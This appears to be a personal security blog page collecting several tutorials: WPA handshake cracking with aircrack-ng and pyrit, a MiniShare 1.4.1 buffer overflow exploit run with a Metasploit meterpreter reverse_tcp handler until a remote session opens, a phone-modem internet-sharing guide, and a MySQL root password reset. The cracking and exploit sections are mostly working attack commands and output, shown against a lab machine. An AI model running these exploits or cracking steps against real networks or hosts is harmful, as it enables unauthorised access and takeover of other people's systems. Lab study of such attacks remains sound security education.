1 00:25:86:B4:A5:3E freenet WPA (1 handshake)

Choosing first network as target.

Opening wpa_capture-01.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:03] 208173 keys tested (69091.19 k/s)

KEY FOUND! [ What's New? the collected adventures of Phil & Dixie ]

Master Key : 67 87 00 46 FB 05 58 50 97 39 DD AE 9F EE 6A 63
68 32 13 F1 77 66 CD B9 81 36 D5 6C DE 82 8F 88

Transient Key : AA 7E 97 98 FF 50 81 34 06 2F 0C 58 2C 00 CD 9C
DF AE 00 1E 8E 79 80 AF 96 02 FE B2 71 50 C2 7F
A7 20 57 DE 14 75 1D F9 2D 70 78 02 25 9C 9A BB
38 6F 7A 5E A8 E8 E9 6E A0 D9 C8 B3 58 0E 03 DB

EAPOL HMAC : 28 FB 3F EE 71 A8 40 AA F5 E9 B4 79 59 ED 65 4E

Quitting aircrack-ng...

in 3 seconds we have our passphrase

so what the point of all this?

the answer is simply SPEED

for example aircrack-ng given a raw wordlist will take longer.


root@thinkpad:~# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst wpa_capture-01.cap
Opening wpa_capture-01.cap
Read 521 packets.

# BSSID ESSID Encryption

1 00:25:86:B4:A5:3E freenet WPA (1 handshake)

Choosing first network as target.

Opening wpa_capture-01.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:03:16] 258536 keys tested (1319.50 k/s)

KEY FOUND! [ What's New? the collected adventures of Phil & Dixie ]

Master Key : 67 87 00 46 FB 05 58 50 97 39 DD AE 9F EE 6A 63
68 32 13 F1 77 66 CD B9 81 36 D5 6C DE 82 8F 88

Transient Key : AA 7E 97 98 FF 50 81 34 06 2F 0C 58 2C 00 CD 9C
DF AE 00 1E 8E 79 80 AF 96 02 FE B2 71 50 C2 7F
A7 20 57 DE 14 75 1D F9 2D 70 78 02 25 9C 9A BB
38 6F 7A 5E A8 E8 E9 6E A0 D9 C8 B3 58 0E 03 DB

EAPOL HMAC : 28 FB 3F EE 71 A8 40 AA F5 E9 B4 79 59 ED 65 4E

and here we had to wait 3+ mins thus the obvious advantage of using a database.

pyrit with databases:
+++++++++++++++
as mentioned earlier you make use of SQL databases instead of file based database
but its good to note that you will need SQLAlchemy
refer to http://www.sqlalchemy.org/

so how do you use a database instead

just add -u option and give your database driver and the database file which will be created automaticaly (SQLite)


root@thinkpad:~# pyrit -u sqlite:///my_pyrit.db -i /pentest/passwords/wordlists/darkc0de.lst import_passwords

one advantage of using a database I liked (though never tested it)
is the ability to have several pyrit-clients connect to the same database at the same time over the network

NOTE:
[1]
there are so many options you can play with given these tools so many. Just time and look at them and get used to the man
command as well as the –help option there is pretty much to these tools.

[2]
aircrack-ng can be compiled to make use of your GPU but this was pyrit’s day out 🙂

name:ch1m3ra

Lesson 0ne: Stack Based Buffer Overflow [minisploit.py]

#=========================================================#
I thought it was a good idea to start learning about exploit development and my first stop was on this wonderful blog by lupin (Thanks a LOT lupin).
to all the beginners like myself I would advice you to look at the tutorials they are exallent.
So after after going throgh the basics tutorial then I thought why not write the exploit from scratch again,make it take options from the command line and use meterpreter as a payload as well as host it some where for feature REFERENCE?
what is it:
++++++++
This is a simple stack based buffer over flow exploit. I wrote this one using the
guides from lupin’s blog as said earlier
It exploits a vulnerability in a Windows application MiniShare 1.4.1.
which is an older version of the MiniShare application
Requirements:

+++++++++++++
1.To test this script you will need a windows xp sp2 machine(can be a virtual machine)
2.The xp machine should be running minishare 1.4.1 available   here
3.An attack machine (should have python and metersploit  installed) bt should do
how to:
++++++
[1]First get the script from here
[2]The payload I used here is meterpreter/reverse_tcp so we need to start a listener on our
attacking machine to take care of this
how:
+++++
[a] run msfconsole from your terminal or from the msf installation directory

root@chim3ra:~# cd /pentest/exploits/framework3
root@chim3ra:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 696 exploits - 358 auxiliary - 52 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r12936 updated 11 days ago (2011.06.13)


Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >

[b]Then we use multi handler to listen on our attacking machine,set payload to meterpreter and lhost to our attacking ip.


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) >

[c]And finally we exploit


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...

[2]now make sure that minshare is running on your xp box if not just double click on the short cut in your desk top and drag a folder or file inside.
Ruunning the script:

++++++++++++++
[2]You may run the script with no options or with the -h (help) option to get the usage


root@chim3ra:~/exploit_home# ./minisploit.py
you need at least one arguments

###################################################################
#============+++++++++ minisploit.py ver0.1++++++++==============#
#----------------by ch!m3ra: http://www.chimera40.wordpress.com------------------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

Usage:./minisploit.py <options>
./minisploit.py -t <host> -p <port>
-t          The remote host to exploit
-p          The remote port (Default is 80)
-h          Simply print this help menu and exit for
Example:./minisploit.py -h 192.168.56.101 -p 80
(this will exploit minishare server at 192.168.56.101 )
or ./minisploit.py -h for help
please make sure you start multi handler(meterpreter)

[3]The run giving -t <host> (target option) where <host> is your xp machine ip
[4]NB:You may give the -p <port> (port option)  or leave it to default 80 where minishare runs on
by default.
[d]Everything set lets launch our exploit

root@chim3ra:~/exploit_home# ./minisploit.py -t 192.168.56.101 -p 80

###################################################################
#============++++++ minisploit.py ver 0.1 ++++++++++==============#
#--------by ch!m3ra: http://www.chimera40.wordpress.com-----------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

[+]Trying your payload on 192.168.56.101  Port 80 Please Wait......
[+]Connecting to  192.168.56.101 ........
[+]Connection successful!
[+]Delivering your payload be patient......
[+]Done!
[+]Your exploit data has been send to 192.168.56.101 Check you handler happy? :)
root@chim3ra:~/exploit_home#

[e]Done and when we check our handler
boooom!

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035) at Fri Jun 24 11:57:11 +0300 2011

meterpreter >

Thats all there is to the post I know its a long post for no good reason but its a post anyway 😉
If you have you have read all through then here are some goodies and some fun here.

This links collection I stubled over it on the net you must like it
Thanks to Myne-us for the links and lupin for teaching me you guys rock 🙂

[how to set up your phone as a modem in Linux]

################################################################  ######==================———————=====================#######

Howdy all!

In this blog post I will summarise what I presented at our JLUG meeting(how to get a reliable internet connection in your room using a mobile phone as a modem in Backtrack Linux).

Requirements:

~~~~~~~~~~~

[1]A YU line(you may use other but be ready to pay)

[2]A mobile phone(with cable) or any 3G modem e.g Hauwei or any other

[3]A linux machine(either installed or a live CD)

Steps:

   

~~~~~~~

[1]Setup:
To set up your modem(phone) plug it in and open a linux terminal,From the Linux terminal type:

code:

root@bt:~# wvdialconf

why? wvdialconf is part of the wvdial scripts that will help you setup your modem it will
(a)Detect your modem(first it will search the serial ports for available modems)

(b)After detection it will create a configuration file for you at /etc/wvdial.conf NB:after the command has terminated you should see a message at the end that the configuration file has been created.

[2]Edit conf file:
To edit the configuration file fire up your favorate text editor (mine is nano) and load the configuration file(/etc/wvdial.conf)

code:

root@bt:~#nano /etc/wvdial.conf

you should see some of these details(your modem type,port,baund rate etc) Uncomment the commented entries in this case Password,Username and Phone and make sure they have these values

Phone=*99#

Password=yu

Username=yu

When you are done just ctrl x (Control x ) why? this will save your changes and exit from the nano text editor.

[3]Connecting:
Now to the juicy part to connect just type:

code:

root@bt:~#wvdial

why? wvdial is simply the dialer script that will dial your Carrier(ISP) in this case YU so that you can be assigned an IP after this command you should get an IP,(your IP,gateway,a DNS server or two should be displayed) and a new interface will be created (usually ppp0) for you.

NB: don’t close this terminal untill you are done with the connection!!!

[4]Test the connection:
To test the connection simply ping whatever you want to:

code:

root@chimera:~# ping google.com
PING google.com (72.14.234.104) 56(84) bytes of data.
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=1 ttl=52 time=496 ms
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=2 ttl=52 time=1016 ms
64 bytes from mil01s07-in-f104.1e100.net (72.14.234.104): icmp_seq=3 ttl=52 time=416 ms
^C
--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2716ms
rtt min/avg/max/mdev = 416.679/643.066/1016.346/265.937 ms, pipe 2
root@chimera:~#

Success!!!

If you are alone thats all And for our Ubuntu brothers? no need to do all this !just plug and play stuff next, next, ok .

Sharing the connection

~~~~~~~~~~~~~~~~~~~~~~~

A times you may want to share this connection with your room mate or any body in the LAN but how?

Concept:

~~~~~~~~

The trick here is to simply tell your friend to use your IP as his/her gateway then you set up your linux machine as a gateway then you forward all the traffic.

NB:your friend’s OS does not matter and the connection speed will not be affected much. [Step I] First lets clear the iptables rules(not a must)

code:

root@chimera:~# iptables --flush
root@chimera:~# iptables --table nat --flush
root@chimera:~# iptables --delete-chain
root@chimera:~# iptables --table nat --delete-chain
root@chimera:~#

[Step II]

Set iptables to forward traffic through our new interface(ppp0)

code:

root@chimera:~# iptables --table nat --append POSTROUTING --out-interface ppp0 
-j MASQUERADE
root@chimera:~# iptables --append FORWARD --in-interface eth0 -j ACCEPT
root@chimera:~#

(where eth0 is our ethernet interface which should be in the LAN)

NB:where –table option is not specified we refer to the default table (filter) check the man pages (man iptables) for more info So far our machine is connected to the internet a fully configured as a gateway to the Internet for other machines in the LAN but we have not enabled IP forwarding in the kernel.

[Step III]

Enabling IP forwarding in our machine .So we need to edit the file /proc/sys/net/ipv4/ip_forward and change the value from 0 to 1 one can choose to use an editor or simply redirect 1 to that file . how?

code:

root@chimera:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@chimera:~#

this will change the value from 0 to 1

[step IV]

All done we tell our friend to set his/her gateway to our IP address

NB:to get our IP address simply type ifconfig the IP set for our eth0 should be our friends gateway IP. NOTE:We can make sure we are on the same network with our friend by typing:

code:
root@bt:~# ifconfig eth0 <our_IP> netmask<netmask> broadcast<broadcast> e.g

root@bt:~# ifconfig eth0 192.168.20.20 netmask 255.255.255.0 broadcast 192.168.20.255

And our freind has Internet connection as well!!!!!!

IMPORTANT

===========

This is not entirely free as you may think but its “free” in that the cost is fair for such connection speeds. To pick a tarrif dial *154# from your YU line and choose a package that fits your pocket or needs(option number 4 for individuals and number 3 for two or more people should be ok).

An automation shell script(to automaticaly do every thing for you) will be available for download soon keep watch:)

#######################################END######################################### ================Brought to you courtesy of ch!m3ra and JLUG======================== ###################################################################################

 
 
 
 
 
 

 

Recover mySQL root password

#########———————————————————-#############
———————+++++++++++++++++++++++++————————-
=================================================

[1] A times we may not be having the MySQL default root password especialy when
we are running a live system(Linux live CD ) and in some “other” situations.
This should not stop us on our tracks.
So get around this I came up with small tut on how reset the root user password
in under well few steps.
NB:tested on MySQL ver.5.0.67
[2] To start with check wether the Mysql service is running.

code:

#service mysql status <ENTER>

if mysql is running then do this to stop it

code:

#service mysql stop <ENTER>

you should get a message that the mysql service has been stopped

[3] Now that we have stoped the service will start it once more but this time in safe
mode and skip the grant tables which are used by mysql to the passwords(google this).

code:

 # mysqld_safe --skip-grant-tables <ENTER>


NB: This service is started but does not immediately go to the background so leave it
running and open a different terminal in another tab or window.
[4] In the new terminal login to the mysql database with a password (usually) by typing mysql.
code:

# mysql <ENTER>

This should log you in automaticaly i.e you should see this kind of prompt mysql>,some
instruction and probably the MySQL version in my case (5.0.67)

[5] Now we are logged in our database to change the root pasword we have use one of the
default databases to list them,

code:

# show databases ; <ENTER>

You should see a database named mysql to use it

code:

# use mysql ; <ENTER>

See every thing is ok or so it seems

[6] Finaly its time to change the password simply do this

code:

 # update user set Password=PASSWORD('your_new_password_here') WHERE user='root';

to flush the privileges

code:

 # flush privileges ;

finaly exit

code:

 # exit ;

[7] Now kill whatever is related to what we have been talking about i.e( ps -e | grep mysql)
eg mysqld-safe and or mysql if not already dead i.e (kill -9 <PID>)

YOU ARE NOW FREE TO LOGGIN INTO YOU DATABASE AS root# THE ORDINARY WAY

code:

 # mysql -u root -p <ENTER>

password: ************* <ENTER>

and you are done

NB:I have not Tried this a Windows installation of mySQL try it I think it should     work just make sure that mysqld.exe and mysql.exe are in your path! Well you     can also start mysql with a txt file having the following code.

code:

update user set Password=PASSWORD('your_new_password_here') WHERE user='root';
flush privileges;

(these two should be in separate lines)
you are done and don’t “forget” your password again!?

brought to you  courtesy of ch1m3ra & JLUG
+++++++++++++++++++++++++++=====END====+++++++++++++++++++++++++++++++++
========================================================================

Advertisements